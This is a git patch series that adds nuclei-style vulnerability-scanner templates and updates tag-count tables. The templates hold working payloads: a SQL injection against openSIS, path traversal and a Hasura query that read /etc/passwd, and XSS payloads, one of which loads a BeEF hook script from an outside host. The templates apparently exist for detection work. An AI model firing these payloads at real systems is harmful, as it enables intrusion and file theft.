-| bolt | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | | vsftpd | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | | landrayoa | 1 | | | | | | | | | | chevereto | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | | wifisky | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | | zcms | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0f79e9d451..0804d72191 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | From b1dfb89f88622b7d640fbe5b077464716bd0929c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:36:48 +0700 Subject: [PATCH 023/478] Create CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 42 ++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2020/CVE-2020-6637.yaml diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml new file mode 100644 index 0000000000..5f0df353e6 --- /dev/null +++ b/cves/2020/CVE-2020-6637.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-6637 + +info: + name: OpenSIS v7.3 unauthenticated SQL injection + author: pikpikcu + severity: high + description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + tags: cve,cve2020,sqli,opensis + reference: | + - https://hackerone.com/reports/643442 + - https://github.com/concrete5/concrete5/pull/7999 + - https://twitter.com/JacksonHHax/status/1389222207805661187 + +requests: + - method: GET + path: + - '{{BaseURL}}/account/index.php' + - '{{BaseURL}}/opensis/index.php' + - '{{BaseURL}}/index.php' + headers: + Content-Type: application/x-www-form-urlencoded + body: | + USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SQL STATEMENT:' + - "UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')" + + - type: word + part: header + words: + - "text/html" + condition: and + + - type: status + status: + - 200 From 96c03d93ccd223ebdbacfbd24d2fcf6d3c0aee70 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:38:49 +0700 Subject: [PATCH 024/478] Update CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 5f0df353e6..fea9cf3f27 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -7,9 +7,8 @@ info: description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: | - - https://hackerone.com/reports/643442 - - https://github.com/concrete5/concrete5/pull/7999 - - https://twitter.com/JacksonHHax/status/1389222207805661187 + - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 + - https://cinzinga.com/CVE-2020-6637/ requests: - method: GET From 29e399df8789b1041b39f8a1f6b802ed9233ad05 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:43:02 +0700 Subject: [PATCH 025/478] Create opensis-lfi.yaml --- vulnerabilities/other/opensis-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/opensis-lfi.yaml diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml new file mode 100644 index 0000000000..b61b2bd930 --- /dev/null +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -0,0 +1,26 @@ +id: opensis-lfi + +info: + name: openSIS 5.1 - 'ajax.php' Local File Inclusion + author: pikpikcu + severity: high + reference: | + - https://www.exploit-db.com/exploits/38039 + - https://www.securityfocus.com/bid/56598/info + tags: opensis,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: From 72c038bbf1cb21e8e5420a459d41a4d626765301 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 08:07:21 +0700 Subject: [PATCH 026/478] Update opensis-lfi.yaml --- vulnerabilities/other/opensis-lfi.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index b61b2bd930..5412177045 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -12,8 +12,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " - - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" + - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php" matchers-condition: and matchers: @@ -24,3 +24,4 @@ requests: - type: status status: + - 200 From 317a63ec9c2602c0a07c69bf980c3e4b767eb0b3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:34:36 +0700 Subject: [PATCH 027/478] Create CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-14013.yaml diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml new file mode 100644 index 0000000000..e7c1f61f6e --- /dev/null +++ b/cves/2018/CVE-2018-14013.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-14013 + +info: + name: Zimbra XSS. + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra + +requests: + - method: GET + path: + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 11372b90efe96915ead338ebd67d524950ea3e4a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 15:41:06 +0700 Subject: [PATCH 028/478] Create dolibarr-detect.yaml --- technologies/dolibarr-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/dolibarr-detect.yaml diff --git a/technologies/dolibarr-detect.yaml b/technologies/dolibarr-detect.yaml new file mode 100644 index 0000000000..77a8f82fdc --- /dev/null +++ b/technologies/dolibarr-detect.yaml @@ -0,0 +1,25 @@ +id: dolibarr-detect + +info: + name: Dolibarr detect + author: pikpikcu + severity: info + tags: tech,dolibarr + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: body + regex: + - 'Dolibarr - Login Dolibarr(.*)' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'center">(.*)' From 9e2de534a85d92b99cbae62eec54a1127c5b24f6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 15:49:19 +0700 Subject: [PATCH 029/478] Create CVE-2018-10095.yaml --- cves/2018/CVE-2018-10095.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-10095.yaml diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml new file mode 100644 index 0000000000..3030d7fc62 --- /dev/null +++ b/cves/2018/CVE-2018-10095.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-10095 + +info: + name: Dolibarr before 7.0.2 allows XSS. + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + tags: cve,cve2018,xss,dolibarr + +requests: + - method: GET + path: + - "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From ab408ccd043b8878b23eea934e7523f9d9f5c46f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 16:03:59 +0700 Subject: [PATCH 030/478] Create CVE-2018-5233.yaml --- cves/2018/CVE-2018-5233.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-5233.yaml diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml new file mode 100644 index 0000000000..ff121f82e0 --- /dev/null +++ b/cves/2018/CVE-2018-5233.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-5233 + +info: + name: Grav CMS before 1.3.0 allows XSS. + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 + tags: cve,cve2018,xss,grav + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/tools/a--%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '>' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 2219ab607e14dc95c1d0aaf2973512234dada2e3 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 21:57:59 +0700 Subject: [PATCH 031/478] Create raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 55 ++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 vulnerabilities/other/raw-psql-warp.yaml diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml new file mode 100644 index 0000000000..71552503a7 --- /dev/null +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -0,0 +1,55 @@ +id: raw-psql-warp + +info: + author: Udyz + name: Warp 3.X.XX - Unauthencation lead to psql query exec + severity: critical + reference: + tags: sql,unauth,rce + +requests: + - raw: + - | + POST /v1/query HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type": "bulk", + "source": "default", + "args":[ + { + "type": "run_sql", + "args": { + "source":"default", + "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", + "cascade": false, + "read_only": false + } + } + ] + } + - | + POST /v2/query HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type": "bulk", + "source": "default", + "args":[ + { + "type": "run_sql", + "args": { + "source":"default", + "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", + "cascade": false, + "read_only": false + } + } + ] + } + matchers: + - type: regex + regex: + - "root:.*:0:0:" From 5c931f8d002587bb997a2547248fdb8d316c4f2f Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 22:12:41 +0700 Subject: [PATCH 032/478] Update raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 21 +-------------------- 1 file changed, 1 insertion(+), 20 deletions(-) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml index 71552503a7..5ca49f4b33 100644 --- a/vulnerabilities/other/raw-psql-warp.yaml +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -9,26 +9,6 @@ info: requests: - raw: - - | - POST /v1/query HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type": "bulk", - "source": "default", - "args":[ - { - "type": "run_sql", - "args": { - "source":"default", - "sql":"SELECT pg_read_file('/etc/passwd',0,100000);", - "cascade": false, - "read_only": false - } - } - ] - } - | POST /v2/query HTTP/1.1 Host: {{Hostname}} @@ -49,6 +29,7 @@ requests: } ] } + matchers: - type: regex regex: From 070682339997c33cc64a2cf705cfa589d8ba426d Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 23:23:55 +0700 Subject: [PATCH 033/478] Update raw-psql-warp.yaml --- vulnerabilities/other/raw-psql-warp.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/raw-psql-warp.yaml index 5ca49f4b33..3a6a332c7c 100644 --- a/vulnerabilities/other/raw-psql-warp.yaml +++ b/vulnerabilities/other/raw-psql-warp.yaml @@ -1,11 +1,11 @@ -id: raw-psql-warp +id: hasura-graphql-psql-exec info: author: Udyz - name: Warp 3.X.XX - Unauthencation lead to psql query exec + name: Hasura GraphQL Engine - postgresql query exec severity: critical - reference: - tags: sql,unauth,rce + reference: https://github.com/projectdiscovery/nuclei-templates/blob/53bed168cce5619e18b991c56779d4ce31ce153f/vulnerabilities/other/hasura-graphql-ssrf.yaml + tags: hasura,rce requests: - raw: From 0c68ef5f669592103b2d5ede7fac1b91a4ec3248 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Tue, 27 Jul 2021 23:25:36 +0700 Subject: [PATCH 034/478] Rename raw-psql-warp.yaml to hasura-graphql-psql-exec.yaml --- .../other/{raw-psql-warp.yaml => hasura-graphql-psql-exec.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{raw-psql-warp.yaml => hasura-graphql-psql-exec.yaml} (100%) diff --git a/vulnerabilities/other/raw-psql-warp.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml similarity index 100% rename from vulnerabilities/other/raw-psql-warp.yaml rename to vulnerabilities/other/hasura-graphql-psql-exec.yaml From e8565eb82c0293f9e3e7a9065fb642bbb44f4327 Mon Sep 17 00:00:00 2001 From: Geeknik Labs 